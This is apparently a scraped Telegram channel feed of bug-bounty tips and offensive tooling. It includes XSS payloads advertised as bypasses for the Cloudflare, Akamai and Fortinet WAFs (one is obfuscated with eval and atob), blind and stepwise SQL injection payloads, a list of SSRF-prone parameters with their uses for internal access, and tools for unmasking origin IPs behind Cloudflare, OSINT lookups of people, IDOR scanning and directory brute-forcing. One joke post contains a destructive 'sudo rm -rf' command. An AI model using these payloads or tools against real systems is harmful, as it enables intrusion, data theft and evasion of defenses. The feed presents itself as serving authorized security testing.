JSNinja - "Hunting Bugs in JavaScript!"
💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.
📊 Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕ Open Source and actively maintained!
🔼 Installation:
💻 Usage:
Command-Line Options:
⚪️
⚪️
⚪️
⚪️
😸 Github
⬇️ Download
🔒
#BugBounty #JS #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.
sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt
python3 jsninja.py -u http://example.com/noscript.js --secrets --urls
Command-Line Options:
-u or --url: Specify a single JavaScript URL to fetch.--secrets: Look for sensitive information in the JavaScript content.--urls: Extract URLs from the JavaScript content.-o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).BugCod3#BugBounty #JS #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤5⚡3🔥3
Top 25 server-side request forgery (SSRF) parameters
Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:
Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:
⚪️ Access services on the loopback interface of the remote server
⚪️ Scan internal network an potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment
#SSRF #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:
#SSRF #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥4⚡2
CloudFlare XSS Bypass!
It's better than our previous
#XSS #Bypass
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
OnXSS=<Img/Src/OnError=alert(1)>
It's better than our previous
<Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.#XSS #Bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤5🔥5🤣3👍1
XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4
Payload:
#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
‘>alert(154)</noscript><noscript/154=’;;;;;;;#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥7❤4⚡3
Fortinet Fortigate XSS Bypass
Payload:
#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👍7🔥4❤3⚡3
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.
cd blackbird
pip install -r requirements.txt
Search by username
python blackbird.py --username username1 username2 username3Search by email
python blackbird.py --email email1@email.com email2@email.com email3@email.comExport results to PDF
python blackbird.py --email email1@email.com --pdfBlackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --aiBugCod3#Python #Osint #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍4🔥3⚡2
javanoscript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
#js #extract #urls
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))
#js #extract #urls
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3👍3🔥3❤🔥2
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *2024
┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 2025#Notification #NewYear
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉12🔥5🍾3🤝1
CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
💬
Denoscription:
This noscript attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12
😸 Github
⬇️ Download
🔒
#Python #CVE #Vulnerable #Detection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection
Denoscription:
This noscript attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable
Affected Versions:
BugCod3#Python #CVE #Vulnerable #Detection
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3🔥3⚡2👎1
HExHTTP
💬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.
📊 Features:
⚪️ Server Error response checking
⚪️ Localhost header response analysis
⚪️ Vhosts checking
⚪️ Methods response analysis
⚪️ HTTP Version analysis [Experimental]
⚪️ Cache Poisoning DoS (CPDoS) techniques
⚪️ Web cache poisoning
⚪️ Range poisoning/error (416 response error) [Experimental]
⚪️ Cookie Reflection
⚪️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]
🔼 Installation:
💻 Usage:
😸 Github
⬇️ Download
🔒
#Python #HTTP #Headers #Analyze
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.
pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]
BugCod3#Python #HTTP #Headers #Analyze
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥3⚡2👍2🍾1
IDOR-Forge
IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
💬 Denoscription:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.
📊 Features:
⚪️ Dynamic Payload Generation
⚪️ Multi-Parameter Scanning
⚪️ Support for Multiple HTTP Methods
⚪️ Concurrent Scanning
⚪️ Rate Limiting Detection
⚪️ Customizable Test Values
⚪️ Sensitive Data Detection
⚪️ Proxy Support
⚪️ Interactive GUI Mode
⚪️ Verbose Mode
⚪️ Output Options
⚪️ Custom Headers
⚪️ Session Handling
🔼 Installation:
💻 Usage:
🖼 Interactive GUI Mode:
😸 Github
⬇️ Download
🔒
#Python #Idor #Vulnerability #Tools
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.
pip install -r requirements.txt
python IDOR-Forge.py
# CLI Basic Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1"
# Advanced Usage
python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv
python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]
python idor_hunter.py --interactive
BugCod3#Python #Idor #Vulnerability #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍4🔥3⚡2
🎯 Directory-Traversal-Payloads 🎯
List of Directory Traversal/LFI Payloads Scraped from the Internet
😸 Github
⬇️ Download
🔒
#Payload #Directory
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
List of Directory Traversal/LFI Payloads Scraped from the Internet
BugCod3#Payload #Directory
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤6⚡2👍2
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability
📊 Category: web applications
💻 Platform: php
🪖 Risk: Security Risk High 🚨
💬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
🔥 CVE: CVE-2025-25163
⬇️ Download
🔒
#CVE #Exploit #PHP #WordPress
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
BugCod3#CVE #Exploit #PHP #WordPress
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤4👍3🔥3
Extracts URLs from OSINT Archives for Security Insights.
💬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
📊 Features:
⚪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
⚪️ Process multiple domains concurrently
⚪️ Filter results by file extensions or patterns
⚪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
⚪️ Multiple output formats (plain, JSON, CSV)
⚪️ Output to console or file
⚪️ Support for reading domains from stdin (pipeline integration)
⚪️ URL testing capabilities (status checking, link extraction)
🔼 Installation:
💻 Usage:
Github
⬇️ Download
🔒
#Osint #URL #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.
📊 Features:
⚪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
⚪️ Process multiple domains concurrently
⚪️ Filter results by file extensions or patterns
⚪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
⚪️ Multiple output formats (plain, JSON, CSV)
⚪️ Output to console or file
⚪️ Support for reading domains from stdin (pipeline integration)
⚪️ URL testing capabilities (status checking, link extraction)
🔼 Installation:
cd urx
cargo build --release
💻 Usage:
# Scan a single domain
urx example.com
# Scan multiple domains
urx example.com example.org
# Scan domains from a file
cat domains.txt | urx
Github
⬇️ Download
🔒
BugCod3#Osint #URL #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤10👍5🔥2⚡1
CF-Hero
💬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
📊 Feautures:
⚪️ DNS Reconnaissance
⚪️ Third-party Intelligence
⚪️ Advanced Features
🔼 Installation:
💻 Usage:
Github
⬇️ Download
🔒
#GO #Origin #IP #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
💬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.
📊 Feautures:
⚪️ DNS Reconnaissance
⚪️ Third-party Intelligence
⚪️ Advanced Features
🔼 Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest
💻 Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero
# or you can pass "f" parameter to it.
cf-hero -f domains.txt
# Use the censys parameter to include Shodan in the scan
cat domain.txt | cf-hero -censys
# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan
# Use the securitytrails parameter to include Shodan in the scan
cat domain.txt | cf-hero -securitytrails
Github
⬇️ Download
🔒
BugCod3#GO #Origin #IP #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤7⚡3👍2🔥2
Blind SQL Injection
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
#BugBounty #Payload #SQLi
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.
Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z#BugBounty #Payload #SQLi
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤7🔥4⚡2
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥5❤3⚡1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!
$
dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
⬇️ Download
#GoBuster #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
$
gobuster dir -u <target-URL> -w <wordlist>dir: Directory scanning
-u: Target URL
-w: Path to wordlist file
⬇️ Download
#GoBuster #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Exploit_Forge
🔥4❤3⚡1
WAF bypass for Akamai and Cloudflare
Payload:
#WAF #Akamai #Cloudflare
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>#WAF #Akamai #Cloudflare
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
1❤4⚡2🔥2